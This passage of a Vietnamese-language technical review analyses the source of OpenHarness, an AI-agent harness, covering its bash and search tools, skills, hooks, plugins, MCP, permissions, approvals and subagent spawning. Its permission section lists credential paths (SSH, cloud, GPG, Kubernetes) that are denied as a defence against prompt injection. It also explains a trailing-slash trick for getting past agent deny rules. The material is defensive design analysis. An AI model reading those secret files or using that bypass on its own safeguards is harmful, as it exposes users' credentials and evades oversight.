pty, os, shlex, signal, asyncio INTERACTIVE_MARKERS = ( ("npm create", "--yes"), ("npx create", "--yes"), ("pnpm create", "--yes"),
("yarn create", "--yes"), ("bun create", "--yes"), ("pip install",
"--quiet"), # may prompt for
confirmation ... ) def _preflight_interactive_command(cmd: str) -> str |
None: """Return error msg if cmd
would prompt interactively.""" tokens = shlex.split(cmd) joined =
" ".join(tokens).lower() for marker, required_flag in
INTERACTIVE_MARKERS: if marker in joined and required_flag
not in joined: return
f"Command likely requires
interaction. Add {required_flag} or equivalent." return None async def run_bash(cmd: str, timeout: float = 600) -> BashResult: # 1. Preflight
check — reject scaffolds without --yes/--ci if err := _preflight_interactive_command(cmd): return BashResult(exit_code=2,
stderr=err, is_error=True) # 2.
Allocate PTY so that TTY-detecting programs work (vim -c, ansi
colors) master_fd, slave_fd = pty.openpty() proc = await asyncio.create_subprocess_exec( "bash", "-c", cmd,
stdin=slave_fd, stdout=slave_fd, stderr=slave_fd, #
merge stderr→stdout preexec_fn=os.setsid, # own
process group ) # 3. Read from master fd with
overall timeout output = bytearray() try:
await asyncio.wait_for(_read_pty(master_fd,
output), timeout=timeout) except
asyncio.TimeoutError: # 4. Graceful: SIGTERM → wait 2s →
SIGKILL os.killpg(os.getpgid(proc.pid), signal.SIGTERM) try: await
asyncio.wait_for(proc.wait(), timeout=2.0) except asyncio.TimeoutError:
os.killpg(os.getpgid(proc.pid), signal.SIGKILL) return BashResult(exit_code=-1,
output=bytes(output), timed_out=True) return BashResult(exit_code=proc.returncode,
output=bytes(output)) npm create X không có
--yes → tránh agent stuck chờ user confirm mãi; (2)
PTY cho tool như git, pip,
npm chạy đúng mode (khác khi chạy trong TTY vs pipe); (3)
Process group + graceful terminate → child process cũng
bị kill, tránh zombie. Timeout 600s dài nhưng 2s grace terminate trước khi
SIGKILL.Code example (generic)
import asyncio, shlex, os, signal, pty INTERACTIVE =
("npm create", "npx
create", "yarn create") async def safe_bash(cmd: str,
timeout=600): for m in INTERACTIVE: if m in cmd.lower() and "--yes" not in cmd: return {"error": f"'{m}' requires --yes to run
non-interactively"} master, slave = pty.openpty() proc = await asyncio.create_subprocess_exec( "bash", "-c", cmd,
stdin=slave, stdout=slave, stderr=slave, preexec_fn=os.setsid, ) try: await
asyncio.wait_for(proc.wait(), timeout) except
asyncio.TimeoutError: os.killpg(os.getpgid(proc.pid), signal.SIGTERM)
try: await
asyncio.wait_for(proc.wait(), 2) except asyncio.TimeoutError:
os.killpg(os.getpgid(proc.pid), signal.SIGKILL) return {"exit":
proc.returncode}
Ưu điểm
- Preflight bắt được phần lớn scaffold prompts
- PTY làm
git/pip/npmoutput đúng format - Process group kill — zombie-free
- Graceful 2s terminate cho chance process flush stdout
Nhược điểm
- INTERACTIVE_MARKERS không đầy đủ — dễ miss tool mới
- PTY không chạy trên Windows (cần alternative)
- Stderr merge vào stdout — mất tín hiệu tách biệt
- 600s timeout quá dài cho nhiều command nhanh
T13. Ripgrep-first Glob/Grep với Python fallback
C.4tools/glob_tool.py L65–122 · tools/grep_tool.py L37–83Code từ OpenHarness
import
shutil, subprocess, fnmatch from pathlib import Path RG_BIN = shutil.which("rg") # detect at import time
async def glob_files(pattern: str, root: Path, *,
respect_gitignore: bool = True) -> list[Path]:
if RG_BIN: # rg --files --glob
PATTERN — respects .gitignore by default args = [RG_BIN, "--files", "--glob", pattern,
str(root)] if not
respect_gitignore: args.insert(1, "--no-ignore") # Include hidden files
if inside a git repo if (root / ".git").is_dir(): args.insert(1, "--hidden") proc = await asyncio.create_subprocess_exec( *args,
stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.DEVNULL )
stdout, _ = await proc.communicate() return [Path(line) for line
in stdout.decode().splitlines()] # --- Python fallback --- # Respect
.gitignore via pathspec library; else just glob results = [] for p in root.rglob("*"): if not p.is_file(): continue if
fnmatch.fnmatch(p.name, pattern) or
fnmatch.fnmatch(str(p), pattern): if respect_gitignore and
_is_gitignored(p, root): continue
results.append(p) return results async def grep_content(pattern:
str, root: Path, *, case_insensitive=False) ->
list[GrepMatch]: if RG_BIN: args = [RG_BIN, "--json", "--with-filename",
pattern, str(root)] if
case_insensitive: args.append("-i") ... else: # Python fallback with
re.compile() regex = re.compile(pattern, re.IGNORECASE if case_insensitive else 0) ... .gitignore mặc định. OpenHarness detect rg tại
import time (shutil.which) — có thì dùng, không có fallback
Python. Special: trong git repo thì --hidden tự động (để tìm
.github/, .vscode/). Python fallback dùng
fnmatch + rglob — chậm nhưng không đòi hỏi
dependency.Code example (generic)
import shutil, asyncio from
pathlib import Path RG = shutil.which("rg") async def fast_glob(pattern: str, root: Path): if RG: args = [RG, "--files",
"--glob", pattern, str(root)] if (root/".git").is_dir(): args.insert(1, "--hidden") proc = await asyncio.create_subprocess_exec(*args,
stdout=asyncio.subprocess.PIPE) out, _ = await
proc.communicate() return [Path(l) for l in
out.decode().splitlines()] # fallback import fnmatch return [p for p in root.rglob("*") if p.is_file() and fnmatch.fnmatch(p.name, pattern)]
Ưu điểm
- 10-100x nhanh hơn Python glob trên repo lớn
- .gitignore respect out-of-box
- Graceful fallback khi không có rg
- JSON output dễ parse
Nhược điểm
- Hidden file behavior khác giữa rg và Python fallback (inconsistent)
- Không có rg-specific features trong Python fallback (PCRE2, multiline)
- Subprocess overhead cho query nhỏ
- Path với space phải quote cẩn thận
D. Extension Ecosystem 4 kỹ thuật
OpenHarness có 4 surface để mở rộng: skills (markdown), hooks (policy/observability), plugins (bundle skill+hook+mcp), MCP (external tool server). Tất cả đều được discover từ filesystem, zero dependency configuration registry.
T14. Markdown-based skill system + frontmatter
D.1src/openharness/skills/loader.py · Lines: 27–51 · Scan paths: bundled + ~/.openharness/skills/<skill>/SKILL.md + plugin skillsCode từ OpenHarness
import
yaml, re from pathlib import Path from dataclasses
import dataclass FRONTMATTER_RE = re.compile(r"^---\n(.*?)\n---\n(.*)",
re.DOTALL) @dataclass class Skill: name: str
description: str path: Path body: str def load_skills(cwd: Path) -> list[Skill]: skills:
list[Skill] = [] seen_names: set[str] = set()
for base in
_skill_roots(cwd): # bundled + ~/.openharness/skills +
plugins if not base.is_dir(): continue for skill_dir in sorted(base.iterdir()): manifest = skill_dir / "SKILL.md" if not
manifest.exists(): continue raw =
manifest.read_text(encoding="utf-8") match =
FRONTMATTER_RE.match(raw) if match: meta =
yaml.safe_load(match.group(1)) or {} body = match.group(2).strip() name = meta.get("name") or skill_dir.name
description = meta.get("description", "") else: #
Fallback: derive from first heading + first paragraph name =
skill_dir.name first_heading = re.search(r"^# (.+)$", raw, re.M) title =
first_heading.group(1) if
first_heading else name first_para =
raw.split("\n\n")[1]
if "\n\n" in raw else "" description = first_para[:200] body = raw # Dedup by name,
first wins (bundled > user > plugin priority) if name in seen_names: continue seen_names.add(name)
skills.append(Skill(name=name, description=description, path=manifest,
body=body)) return skills SKILL.md với frontmatter mô tả. System prompt sẽ inject
description của tất cả skills có sẵn — LLM đọc description rồi "kích hoạt"
skill nếu relevant (tức LLM request read file SKILL.md để đọc full
instruction). Thiết kế này giống Claude Code skills. Fallback khi thiếu
frontmatter giúp test dễ (chỉ cần một file SKILL.md là
enough). Priority first-wins: built-in ưu tiên, user override
sau, plugin cuối.Code example (generic)
import yaml, re from pathlib
import Path def discover_skills(roots: list[Path]): skills = []; seen =
set() for root in roots: if not root.is_dir():
continue for d in sorted(root.iterdir()): mf = d / "SKILL.md" if not mf.exists():
continue raw = mf.read_text() m = re.match(r"^---\n(.*?)\n---\n(.*)", raw,
re.DOTALL) meta, body = (yaml.safe_load(m.group(1)), m.group(2)) if m else ({}, raw) name =
meta.get("name", d.name) if name in seen: continue # first-wins
seen.add(name) skills.append({"name": name, "description": meta.get("description", ""), "body": body}) return
skills
Ưu điểm
- User-friendly — chỉ cần biết markdown
- Git-friendly — diff/review dễ
- Frontmatter machine-readable, body human-readable
- Layered priority (builtin/user/plugin)
Nhược điểm
- Skill lớn tốn token khi LLM load body
- Không có versioning / dependency giữa skills
- Priority có thể surprise (first-wins khó debug khi nhiều plugin)
- Fallback parse bất định khi heading không chuẩn
→ Phân tích sâu T14: Markdown-based skill system + frontmatter discovery
T15. Hook lifecycle system (6 events · 4 types · hot reload)
D.2src/openharness/hooks/events.py, hooks/executor.py · Reloader: HookReloader watches mtimeCode từ OpenHarness
from enum
import Enum class HookEvent(Enum): SESSION_START = "session_start" SESSION_END = "session_end" PRE_COMPACT = "pre_compact" POST_COMPACT = "post_compact" PRE_TOOL_USE = "pre_tool_use" POST_TOOL_USE = "post_tool_use" class HookType(Enum): COMMAND = "command" # exec shell command, check
exit code PROMPT = "prompt" # LLM judges payload vs policy HTTP = "http" # POST payload to
webhook AGENT = "agent" # spawn subagent for decision class HookExecutor: async def execute(self, event:
HookEvent, payload: dict) -> HookResult: self._maybe_reload() # hot-reload when files changed blocked, reasons =
False, [] for hook in self._hooks_for(event): res = await hook.run(payload) reasons.append(res.message)
if res.blocked: blocked = True if hook.type ==
HookType.COMMAND: break #
short-circuit for command hooks return
HookResult(blocked=blocked, reason=";
".join(reasons)) class HookReloader: """Watch hook file
mtime; reload config when modified.""" def
maybe_reload(self): for
path, old_mtime in list(self._mtimes.items()): new_mtime =
path.stat().st_mtime if new_mtime != old_mtime:
log.info("reloading hooks from %s", path)
self._hooks = self._parse(path) self._mtimes[path] =
new_mtime hooks.yaml không cần restart session.Code example (generic)
import asyncio,
subprocess from enum import Enum class HookEvent(Enum): PRE_TOOL = "pre_tool"; POST_TOOL = "post_tool" class CommandHook: def __init__(self, cmd): self.cmd = cmd async def run(self, payload):
proc = await asyncio.create_subprocess_shell(
self.cmd, stdin=asyncio.subprocess.PIPE, stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE, ) out, err = await
proc.communicate(json.dumps(payload).encode()) return {"blocked":
proc.returncode != 0, "reason": err.decode()} class
HookExecutor: def __init__(self, hooks_by_event): self.hooks =
hooks_by_event async def fire(self, event, payload): for
h in self.hooks.get(event, []): r = await h.run(payload) if r["blocked"]: return r return {"blocked": False}
Ưu điểm
- 6 lifecycle events covers compaction + tool + session
- Hot reload — no session restart
- 4 hook types — flexible (simple → sophisticated)
- Short-circuit for command hooks — perf-friendly
Nhược điểm
- LLM-based prompt hook tốn API call — latency + cost
- Hot reload race với hook đang chạy
- Không có "chain" semantics — mỗi hook độc lập
- Agent hook có thể recursive call trở lại main agent
→ Phân tích sâu T15: Hook lifecycle system (6 events · 4 types · hot reload)
T16. Plugin manifest-based loading
D.3src/openharness/plugins/loader.py · Lines: 104–157 · Paths: ~/.openharness/plugins/ (user) + .openharness/plugins/ (project)Code từ OpenHarness
import
yaml from pathlib import
Path from dataclasses import dataclass, field @dataclass class PluginManifest: name: str version: str description:
str skills_dir: str | None = None # relative path to skills/
hooks_file: str | None = None # relative path to
hooks.yaml mcp_file: str | None = None # relative path to
mcp.json commands_dir: str | None = None # relative path to
commands/ def load_plugins(cwd: Path) -> list[Plugin]: plugins = []
roots = [ Path.home() / ".openharness" / "plugins", cwd / ".openharness" / "plugins", ]
for root in roots: if not root.is_dir(): continue
for plugin_dir in
sorted(root.iterdir()): manifest_path = plugin_dir / "plugin.yaml" if not
manifest_path.exists(): continue data =
yaml.safe_load(manifest_path.read_text()) manifest =
PluginManifest(**data) # Resolve relative paths to
absolute skills = [] if
manifest.skills_dir: skills_path = plugin_dir / manifest.skills_dir skills
= _load_skills_from(skills_path) hooks = [] if
manifest.hooks_file: hooks_path = plugin_dir / manifest.hooks_file hooks =
_parse_hooks_yaml(hooks_path) mcp_servers = [] if
manifest.mcp_file: mcp_path = plugin_dir / manifest.mcp_file mcp_servers =
_parse_mcp_json(mcp_path) commands = [] if
manifest.commands_dir: # Namespace:
"plugin:<plugin_name>:<file_stem>" commands_path =
plugin_dir / manifest.commands_dir for cmd_file
in sorted(commands_path.glob("*.md")): commands.append(Command( name=f"plugin:{manifest.name}:{cmd_file.stem}",
body=cmd_file.read_text(), )) plugins.append(Plugin( manifest=manifest,
skills=skills, hooks=hooks, mcp_servers=mcp_servers, commands=commands, ))
return plugins plugin.yaml chỉ list các path relative — không embed content.
Command có namespace plugin:<name>:<file> để
tránh conflict. Hai root: user global + project local — project override
user. Đây là pattern quen thuộc của Claude Code plugins, port sang
Python.Code example (generic)
import yaml from pathlib import Path def load_plugins(roots: list[Path]) -> list: out = [] for root in roots: for d in sorted(root.glob("*")) if root.is_dir() else []: mf = d
/ "plugin.yaml" if not
mf.exists(): continue data =
yaml.safe_load(mf.read_text()) plugin = { "name":
data["name"], "root": d,
"skills": load_skills_dir(d / data.get("skills_dir", "skills")),
"hooks": load_hooks(d / data["hooks_file"]) if
data.get("hooks_file") else [], "mcp": load_mcp(d /
data["mcp_file"]) if
data.get("mcp_file") else
[], } out.append(plugin) return out
Ưu điểm
- Single manifest declare everything
- Bundle skill + hook + MCP coherently
- Namespace tránh command conflict
- Git/filesystem distributable
Nhược điểm
- Không có semver / dependency resolution
- Security: plugin hook có thể exec arbitrary shell
- No signing / verification
- Bundled layout cứng nhắc (skills_dir fixed name)
T17. MCP stdio + HTTP transport + dynamic Pydantic adapter
D.4src/openharness/mcp/client.py · Lines: 29–95 · Aggregator: McpClientManager uses AsyncExitStackCode từ OpenHarness
from
contextlib import AsyncExitStack from mcp import ClientSession,
StdioServerParameters from mcp.client.stdio import stdio_client from
mcp.client.sse import sse_client from pydantic import
create_model class McpClientManager: def __init__(self, server_configs): self._configs =
server_configs self._stack: AsyncExitStack | None
= None self._sessions: dict[str, ClientSession] = {} self._tools: list[McpTool] = [] async def
__aenter__(self): self._stack = AsyncExitStack()
await self._stack.__aenter__() for name, cfg in
self._configs.items(): if cfg.transport == "stdio": params =
StdioServerParameters(command=cfg.command, args=cfg.args, env=cfg.env)
stream_ctx = stdio_client(params) elif
cfg.transport == "http": stream_ctx =
sse_client(cfg.url, headers=cfg.headers) else:
raise ValueError(f"Unknown MCP transport: {cfg.transport}") streams =
await self._stack.enter_async_context(stream_ctx)
session = ClientSession(*streams) await
self._stack.enter_async_context(session) await
session.initialize() self._sessions[name] = session #
Discover tools + build Pydantic adapter for each resp = await session.list_tools() for
tool in resp.tools: InputModel =
_build_pydantic_from_schema(tool.inputSchema, name=tool.name)
self._tools.append(McpTool( server=name, name=f"mcp__{name}__{tool.name}",
# namespaced tool id
description=tool.description, input_model=InputModel, session=session, ))
return self async def
__aexit__(self, *exc): if
self._stack: await self._stack.__aexit__(*exc)
def _build_pydantic_from_schema(schema: dict, *, name: str):
"""Convert JSON schema to a dynamic Pydantic
model.""" fields = {} for prop, spec in schema.get("properties",
{}).items(): py_type = _json_type_to_python(spec.get("type", "string"))
fields[prop] = (py_type, ...) # required return create_model(f"Mcp_{name}_Input", **fields) AsyncExitStack per-server đảm bảo cleanup đúng ngay cả khi
một server fail init. create_model build Pydantic từ JSON
schema runtime — tức tool được validate như tool native. Namespace
mcp__<server>__<tool> tránh conflict giữa server
có cùng tool name. Dual transport stdio+HTTP cho local subprocess hoặc
remote SaaS MCP.Code example (generic)
from contextlib import
AsyncExitStack from pydantic import create_model class McpManager: async def __aenter__(self): self.stack = await AsyncExitStack().__aenter__() self.sessions = {}
self.tools = [] for name, cfg in self.configs.items(): ctx = stdio_client(cfg) if cfg.transport == "stdio"
else sse_client(cfg) streams = await self.stack.enter_async_context(ctx) sess = await
self.stack.enter_async_context(ClientSession(*streams)) await sess.initialize() for t
in (await
sess.list_tools()).tools: self.tools.append({"name": f"mcp__{name}__{t.name}", "model": create_model(f"M_{t.name}", **...)}) return
self
Ưu điểm
- Dual transport — stdio (local) + HTTP (remote)
- AsyncExitStack → nested cleanup an toàn
- Dynamic Pydantic — tool MCP validate như native
- Namespace tránh conflict
Nhược điểm
- JSON schema → Pydantic chưa hỗ trợ allOf/oneOf phức tạp
- Một server stuck block toàn bộ init (không có per-server timeout)
- SSE transport không có retry built-in
- Schema không support descriptions for enum values
→ Phân tích sâu T17: MCP stdio + HTTP transport + dynamic Pydantic adapter
E. Permission & Safety 4 kỹ thuật
Permission model của OpenHarness có 3 mode + built-in sensitive path protection + 6-layer hierarchical evaluation + async interactive approval. Đây là điểm OpenHarness cẩn thận hơn opencode: sensitive path protection không thể bị override, ngay cả trong FULL_AUTO.
T18. 3-mode permission system (DEFAULT / PLAN / FULL_AUTO)
E.1src/openharness/permissions/modes.py · Hằng: PermissionMode.DEFAULT / PLAN / FULL_AUTOCode từ OpenHarness
from enum
import Enum class PermissionMode(Enum): DEFAULT = "default" # read OK; write &
mutation need confirm PLAN = "plan" # only read; block all mutations (even bash read-only)
FULL_AUTO = "full_auto" #
everything OK (except sensitive paths) # Used in
PermissionChecker.evaluate() — see T20 if
self._settings.mode == PermissionMode.FULL_AUTO: return PermissionDecision(allowed=True, reason="Auto mode allows all
tools") if is_read_only: return PermissionDecision(allowed=True, reason="read-only tools are
allowed") if self._settings.mode ==
PermissionMode.PLAN: return PermissionDecision(
allowed=False, reason="Plan mode
blocks mutating tools until the user exits plan mode", ) # DEFAULT: require confirmation for mutating tools
return PermissionDecision( allowed=False, requires_confirmation=True, reason="Mutating tools require
user confirmation in default mode. ...", ) Code example (generic)
from
enum import Enum class
Mode(Enum): DEFAULT = "default"; PLAN = "plan";
FULL_AUTO = "full_auto" def decide(mode: Mode,
is_read_only: bool) -> str: if mode == Mode.FULL_AUTO:
return "allow" if is_read_only: return "allow" if mode == Mode.PLAN:
return "deny" return "confirm" # DEFAULT needs user approval
Ưu điểm
- 3 modes cover trivial → unattended workflow
- Mode tách biệt khỏi approval → checker pure function
- PLAN đặc biệt hữu ích cho "research mode"
- User intent rõ ràng — không cần edit config
Nhược điểm
- 3 modes không đủ granular (vd: "allow bash, confirm edit")
- FULL_AUTO có thể bị lạm dụng trên production
- PLAN block bash read-only (git status) nếu tool self-declare mutating
- Mode toggle không persist per project
→ Phân tích sâu T18: 3-mode permission system (DEFAULT / PLAN / FULL_AUTO)
T19. Built-in sensitive path protection (hardcoded glob)
E.2src/openharness/permissions/checker.py · Lines: 14–37 · Patterns: 10+ hardcodedCode từ OpenHarness
# Paths that are
always denied regardless of permission mode or user config. # These protect high-value credential and key material from
LLM-directed access # (including via prompt
injection). Patterns use fnmatch syntax and are matched # against the fully-resolved absolute path produced by the
query engine. SENSITIVE_PATH_PATTERNS: tuple[str, ...] = ( # SSH keys and config "*/.ssh/*", # AWS credentials
"*/.aws/credentials", "*/.aws/config", # GCP
credentials "*/.config/gcloud/*", # Azure credentials "*/.azure/*", # GPG keys "*/.gnupg/*", # Docker
credentials "*/.docker/config.json", # Kubernetes credentials "*/.kube/config", # OpenHarness own
credential stores "*/.openharness/credentials.json", "*/.openharness/copilot_auth.json", ) def evaluate(self, tool_name, *,
is_read_only, file_path=None, command=None): # Sensitive path check runs
FIRST, cannot be overridden if file_path:
for candidate in
_policy_match_paths(file_path): for pattern in SENSITIVE_PATH_PATTERNS: if
fnmatch.fnmatch(candidate, pattern): return
PermissionDecision( allowed=False, reason=f"Access denied: {file_path} is a
sensitive credential path" ) # ... rest of
evaluation ... ~/.ssh/id_rsa rồi paste vào response. OpenHarness đặt
sensitive path check ngoài permission mode — ngay cả
FULL_AUTO cũng không bypass được. 10+ pattern cover
SSH/AWS/GCP/Azure/GPG/Docker/K8s/own credentials. fnmatch
thay vì regex để pattern đơn giản (wildcards */), không cần
escape đặc biệt.Code example (generic)
import fnmatch from pathlib
import Path SENSITIVE = ( "*/.ssh/*", "*/.aws/credentials", "*/.gnupg/*", "*/.kube/config", "*/.azure/*", "*/.docker/config.json", ) def
is_sensitive_path(path: str) -> bool: # Match against both "dir" and "dir/" to catch directory
roots normalized = path.rstrip("/")
candidates = (normalized, normalized + "/") return any(fnmatch.fnmatch(c, pat) for c in candidates for pat in SENSITIVE) def check_permission(path,
mode): if is_sensitive_path(path): return {"allowed": False, "reason": f"{path} is sensitive"} # ... other checks by mode ...
Ưu điểm
- Defence-in-depth against prompt injection
- Cannot be bypassed by mode / config
- Standard well-known credential paths
- fnmatch patterns — easy to audit
Nhược điểm
- Hardcoded list — cần update khi có cloud provider mới
- Không cover custom credential locations (
~/.company-secrets/) - False positive: legit debug cho
~/.ssh/config - Không protect Windows paths (
%USERPROFILE%\.ssh\)
→ Phân tích sâu T19: Built-in sensitive path protection (hardcoded glob)
T20. 6-layer hierarchical permission evaluation + path normalization
E.3src/openharness/permissions/checker.py · Hàm: evaluate() · Lines: 75–169Code từ OpenHarness
def evaluate(self, tool_name, *, is_read_only,
file_path=None, command=None): # Layer 1: sensitive path
protection (see T19) if file_path: for candidate in
_policy_match_paths(file_path): for pattern in SENSITIVE_PATH_PATTERNS: if
fnmatch.fnmatch(candidate, pattern): return
PermissionDecision(allowed=False, reason="sensitive") # Layer 2: explicit tool
deny list if tool_name in self._settings.denied_tools: return PermissionDecision(allowed=False, reason=f"{tool_name} is explicitly denied") #
Layer 3: explicit tool allow list if
tool_name in self._settings.allowed_tools: return PermissionDecision(allowed=True, reason=f"{tool_name} is explicitly allowed") # Layer 4: path rules (glob-based) if file_path and
self._path_rules: for candidate in _policy_match_paths(file_path): for rule in self._path_rules:
if fnmatch.fnmatch(candidate, rule.pattern): if not rule.allow: return
PermissionDecision(allowed=False, reason=f"deny rule: {rule.pattern}")
# Layer 5: command deny patterns (bash-specific)
if command: for pattern
in getattr(self._settings, "denied_commands", []): if
isinstance(pattern, str) and fnmatch.fnmatch(command, pattern): return PermissionDecision(allowed=False, reason=f"cmd deny: {pattern}") # Layer 6:
fall back to mode (FULL_AUTO / PLAN / DEFAULT) if self._settings.mode == PermissionMode.FULL_AUTO:
return PermissionDecision(allowed=True) if is_read_only: return PermissionDecision(allowed=True) if self._settings.mode ==
PermissionMode.PLAN: return
PermissionDecision(allowed=False, reason="plan blocks mutations") return
PermissionDecision(allowed=False,
requires_confirmation=True) def _policy_match_paths(file_path: str) -> tuple[str, ...]: """Return path forms that
should participate in policy matching. Appending a trailing slash lets
glob-style deny patterns like ``*/.ssh/*`` and ``/etc/*`` match the
directory root itself. """ normalized = file_path.rstrip("/") if not normalized: return (file_path,) return
(normalized, normalized + "/") _policy_match_paths: trả về cả
"/home/x/.ssh" và "/home/x/.ssh/". Vì
glob tool có thể gọi với path không có trailing slash, và pattern
"*/.ssh/*" sẽ không match mỗi bản — nếu không normalize, có
thể bypass. Đây là lỗ hổng kinh điển mà Adversa publish cho Claude Code
deny rules.Code example (generic)
def evaluate_perm(tool, *,
path=None, cmd=None,
settings, mode): # Layer 1: sensitive paths
(hardcoded) if path and is_sensitive(path): return
deny("sensitive") # Layer 2:
tool deny list if tool in settings.denied_tools: return
deny("tool denied") # Layer 3:
tool allow list if tool in settings.allowed_tools: return allow("tool allowed")
# Layer 4: path rules if
path and (r := match_path_rule(path,
settings.path_rules)): if not r.allow: return deny(f"path rule: {r.pattern}") # Layer 5:
command deny if cmd and any(fnmatch.fnmatch(cmd, p) for p in
settings.denied_commands): return deny("command deny") # Layer 6:
mode return mode_decision(mode,
tool.is_read_only)
Ưu điểm
- Hierarchy rõ ràng — dễ audit "tại sao tool bị allow/deny"
- Path normalization tránh bypass bằng trailing slash
- Mỗi layer có reason riêng cho log
- Sensitive path first — cannot be overridden
Nhược điểm
- 6 layer phức tạp — user khó predict behavior
- Layer 3 (allow) override layer 4 (path rule) — counter-intuitive
- Không có conflict detection giữa allow/deny cùng pattern
- Bash arg parsing không sophisticated như opencode tree-sitter
→ Phân tích sâu T20: 6-layer hierarchical permission evaluation + path normalization
T21. Async interactive approval với UUID + 300s timeout + lock
E.4src/openharness/ui/backend_host.py · Lines: 684–706 · Timeout: 300s · Lock: _permission_lockCode từ OpenHarness
import
asyncio, uuid from dataclasses import dataclass @dataclass
class PendingApproval:
request_id: str tool_name: str tool_input: dict future:
asyncio.Future[PermissionResolution] class BackendHost: def __init__(self): self._pending_approvals: dict[str, PendingApproval] = {}
self._permission_lock = asyncio.Lock() async def
request_approval(self, tool_name, tool_input, *,
timeout=300.0): async
with self._permission_lock: # only one approval
at a time request_id = str(uuid.uuid4())
fut: asyncio.Future[PermissionResolution] =
asyncio.get_running_loop().create_future()
self._pending_approvals[request_id] = PendingApproval(
request_id=request_id, tool_name=tool_name, tool_input=tool_input,
future=fut, ) # Emit event to UI with request_id; UI
sends back resolve_approval() later await
self._emit(ApprovalRequestEvent( request_id=request_id,
tool_name=tool_name, tool_input=tool_input, )) try: return await
asyncio.wait_for(fut, timeout=timeout) except
asyncio.TimeoutError: return
PermissionResolution(approved=False, reason="timeout") finally:
self._pending_approvals.pop(request_id, None)
def resolve_approval(self,
request_id: str, approved: bool, remember: bool = False): # Called from UI when user
clicks Allow/Deny pending = self._pending_approvals.get(request_id)
if pending is not None and
not pending.future.done():
pending.future.set_result(PermissionResolution(approved=approved,
remember=remember)) Future là cầu nối: engine await fut,
UI fut.set_result(...). UUID gán duy nhất cho mỗi approval →
race an toàn khi nhiều tool call concurrent. _permission_lock
đảm bảo chỉ một approval dialog show cùng lúc (UX). Timeout 300s phòng
user walk away. Cleanup trong finally tránh memory
leak.Code example (generic)
import asyncio, uuid class ApprovalHost: def __init__(self): self.pending = {} self.lock =
asyncio.Lock() async def ask(self, payload, timeout=300)
-> bool: async with
self.lock: rid = str(uuid.uuid4()) fut =
asyncio.get_running_loop().create_future() self.pending[rid] = fut await self.notify_ui({"id":
rid, "payload": payload}) try: return await
asyncio.wait_for(fut, timeout) except
asyncio.TimeoutError: return False finally: self.pending.pop(rid, None) def resolve(self, rid: str,
approved: bool): if (fut
:= self.pending.get(rid)) and not fut.done():
fut.set_result(approved)
Ưu điểm
- Async-native — không block event loop
- UUID tránh race giữa nhiều tool pending
- Lock giữ UX "one dialog at a time"
- Timeout tránh stuck session
Nhược điểm
- Lock serialize → multiple tool call latency tăng
- 300s timeout có thể quá ngắn khi user busy
- Không có "remember always" semantics ở đây (layer khác)
- Future leak nếu UI ghost không bao giờ resolve
→ Phân tích sâu T21: Async interactive approval với UUID + 300s timeout + lock
F. Multi-Agent Swarm 5 kỹ thuật · UNIQUE vs opencode
T22. Subprocess-based subagent spawning
F.1src/openharness/swarm/subprocess_backend.py · Lines: 28–103 · Manager: BackgroundTaskManager · API: create_agent_task()Code từ OpenHarness
import
asyncio, os, sys from pathlib import Path class SubprocessAgent: def __init__(self, agent_id: str, definition:
AgentDefinition, team_dir: Path, worktree: Path | None): self.agent_id = agent_id self.definition =
definition self.team_dir = team_dir # shared team
state self.worktree = worktree # git worktree for
isolation self.proc: asyncio.subprocess.Process | None = None async def spawn(self): # Build CLI args — forward relevant flags from parent
cmd = [ sys.executable, "-m", "openharness", "run-agent",
"--agent-id", self.agent_id, "--team-dir", str(self.team_dir), "--model",
self.definition.model, "--effort",
self.definition.effort, "--permission-mode",
self.definition.permission_mode.value, ] if
self.definition.max_turns is not None: cmd +=
["--max-turns", str(self.definition.max_turns)] cwd = str(self.worktree) if
self.worktree else None #
Inherit env but add OPENHARNESS_SWARM_AGENT_ID env =
os.environ.copy() env["OPENHARNESS_SWARM_AGENT_ID"] = self.agent_id env["OPENHARNESS_SWARM_TEAM_DIR"] = str(self.team_dir) self.proc = await asyncio.create_subprocess_exec( *cmd, cwd=cwd,
env=env, stdin=asyncio.subprocess.DEVNULL, stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE, ) log.info("spawned
subagent pid=%s id=%s", self.proc.pid, self.agent_id) class BackgroundTaskManager:
"""Registry of running subagents; support
list/kill/wait.""" def __init__(self): self._agents: dict[str, SubprocessAgent]
= {} async def create_agent_task(self, definition: AgentDefinition, *,
worktree=None) -> str: agent_id = f"task-{uuid.uuid4().hex[:8]}"
agent = SubprocessAgent(agent_id, definition, self.team_dir, worktree)
await agent.spawn() self._agents[agent_id] = agent
return agent_id cwd=worktree
khác, sửa branch khác. Đánh đổi: overhead spawn (~500ms-1s), không share
memory → cần IPC (xem T23 mailbox).Code example (generic)
import asyncio, os, sys, uuid class SubprocessAgent: def __init__(self, agent_id,
model, team_dir, cwd=None): self.agent_id =
agent_id; self.model = model self.team_dir = team_dir; self.cwd = cwd
async def spawn(self): cmd
= [sys.executable, "-m", "myagent", "worker", "--id", self.agent_id, "--model", self.model, "--team-dir", self.team_dir] env = {**os.environ, "AGENT_ID": self.agent_id} self.proc = await asyncio.create_subprocess_exec( *cmd,
cwd=self.cwd, env=env, stdin=asyncio.subprocess.DEVNULL,
stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE, ) return self.proc.pid
Ưu điểm
- Fault isolation — 1 agent die không kéo theo team
- Parallel CPU thực sự (không bị GIL)
- Permission/model scope per-agent
- Clean shutdown qua subprocess signaling
Nhược điểm
- Spawn overhead 500ms-1s mỗi agent
- Không share in-memory cache → I/O overhead
- IPC qua filesystem → latency
- Debugging khó hơn single-process (stderr tách)
T23. File-based async mailbox với atomic writes
F.2src/openharness/swarm/mailbox.py · Lines: 1–95 · Layout: ~/.openharness/teams/<team>/agents/<id>/inbox/Code từ OpenHarness
import
json, os, uuid, time from pathlib import Path class Mailbox: """File-based inbox for a
single agent. Layout: inbox/ <sort_key>-<uuid>.tmp ← being
written (atomic) <sort_key>-<uuid>.json ← delivered
(consumable) """ def __init__(self, agent_dir: Path): self.inbox = agent_dir
/ "inbox" self.inbox.mkdir(parents=True, exist_ok=True) def send(self, envelope: dict):
"""Atomic write: write .tmp then rename to
.json.""" sort_key = f"{time.time_ns():020d}" # nanosecond
for ordering msg_id = uuid.uuid4().hex[:8]
base = self.inbox / f"{sort_key}-{msg_id}" tmp = base.with_suffix(".tmp") final = base.with_suffix(".json") tmp.write_text(json.dumps(envelope,
ensure_ascii=False)) os.rename(tmp, final) # atomic on POSIX async def
